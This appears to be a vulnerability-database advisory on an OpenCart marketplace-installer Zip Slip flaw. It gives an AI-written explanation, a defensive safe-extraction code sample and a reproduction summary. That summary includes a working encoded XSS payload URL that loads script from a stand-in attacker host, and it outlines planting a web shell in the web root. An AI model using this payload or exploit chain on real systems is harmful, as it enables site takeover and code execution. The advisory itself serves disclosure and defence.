VYPR
High severity · NVD Advisory · Published Jun 22, 2024 · Updated Aug 1, 2024

CVE-2024-21518

Description

This affects versions of the package opencart/opencart from 4.0.0.0. A Zip Slip issue was identified via the marketplace installer due to improper sanitization of the target path, allowing files within a malicious archive to traverse the filesystem and be extracted to arbitrary locations. An attacker can create arbitrary files in the web root of the application and overwrite other existing files by exploiting this vulnerability.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package | Affected versions | Patched versions
opencart/opencart (Packagist) | >= 4.0.0.0 | (none listed)

Vulnerability mechanics

Root cause

"Improper sanitization of archive entry paths in the marketplace installer allows directory traversal sequences to escape the intended extraction directory."

Attack vector

An attacker crafts a malicious ZIP archive containing files with path traversal sequences (e.g., `../../oc.php`) in their entry names. The attacker must first achieve admin-level access to the OpenCart backend; the Snyk advisory demonstrates chaining this with a stored XSS vulnerability to trick an authenticated admin into uploading the malicious archive [ref_id=2]. Once uploaded via the marketplace installer, the insufficient path sanitization causes the archive extraction to write files outside the intended directory, allowing the attacker to place a web shell (e.g., `oc.php`) in the web root and achieve remote code execution [CWE-22][CWE-29].

Affected code

The vulnerability resides in the marketplace installer component of OpenCart, specifically in the archive extraction logic that handles uploaded extension packages. The code does not properly sanitize path components within archive entries, allowing filenames containing directory traversal sequences (e.g., `../`) to escape the intended extraction directory. The exact file path is not shown in the advisory, but the installer's upload and install routes (`route=marketplace/installer.upload` and `route=marketplace/installer.install`) are the entry points [ref_id=2].

What the fix does

The Snyk advisory states that no fixed version has been released for opencart/opencart as of the disclosure date [ref_id=2]. The recommended remediation would be to add validation that rejects archive entry names containing `../` or `..\` sequences, and to ensure the resolved extraction path remains within the intended base directory. Without an official patch, administrators should restrict access to the marketplace installer functionality and avoid uploading extension packages from untrusted sources.
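The two checks the advisory recommends, shown as an added example that is not OpenCart's own code (OpenCart is PHP; this is a Python illustration of the same logic): a lexical rejection of traversal segments in each entry name, followed by a containment check on the resolved target path. The sample archive is constructed inline and reuses only the two entry names the PoC mentions.

```python
from __future__ import annotations

import io
import os
import posixpath
import tempfile
import zipfile


def normalize_entry_name(name: str) -> str | None:
    """Normalized relative path for a ZIP entry, or None if it must be rejected."""
    # Treat '\' as a separator too, so '..\..\oc.php' is caught like '../../oc.php'.
    name = name.replace("\\", "/")
    if not name or name.startswith("/") or (len(name) > 1 and name[1] == ":"):
        return None  # absolute path or Windows drive prefix
    parts = [seg for seg in name.split("/") if seg not in ("", ".")]
    if not parts or ".." in parts:
        return None  # any '..' segment is rejected outright, not "cleaned"
    return posixpath.join(*parts)


def safe_extract(zip_bytes: bytes, base_dir: str) -> tuple[list[str], list[str]]:
    """Extract into base_dir; return (written relative paths, rejected entry names)."""
    base = os.path.realpath(base_dir)
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            rel = normalize_entry_name(info.filename)
            dest = None if rel is None else os.path.realpath(os.path.join(base, rel))
            # Containment check on the resolved path; also stops a symlink under base_dir
            # from redirecting the write outside it.
            if dest is None or os.path.commonpath([base, dest]) != base:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(dest, base))
    return written, rejected


def demo() -> tuple[list[str], list[str]]:
    """Constructed sample archive (the PoC's two entry names) run through safe_extract."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("../../oc.php", "<?php /* constructed placeholder, not a shell */ ?>")
        zf.writestr("install.json", '{"name": "constructed demo extension"}')
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(buf.getvalue(), tmp)
```

The traversal entry is reported rather than silently dropped, which gives the installer something to log and surface to the admin.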

Preconditions

  • auth: Attacker must have or obtain admin-level access to the OpenCart backend (the PoC chains an XSS vulnerability to achieve this)
  • input: The admin must upload a malicious ZIP archive via the marketplace installer
  • config: The application must be running OpenCart version 4.0.0.0 or later

Reproduction

The Snyk advisory includes a full exploit chain [ref_id=2]. An attacker first sends an XSS URL to an admin: `https://mywebstore.com/admin/index.php?route=common/filemanager.list&directory=demo%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252Flocalhost%253A8000%252Foc.js%2522%253E%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden`. Upon login, the admin is redirected to that URL with a `user_token`. The XSS payload (hosted at `http://localhost:8000/oc.js`) base64-decodes a malicious ZIP containing `../../oc.php` and `install.json`, uploads it via `route=marketplace/installer.upload`, then iterates through install IDs calling `route=marketplace/installer.install` until the web shell at `/oc.php` returns HTTP 200.

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.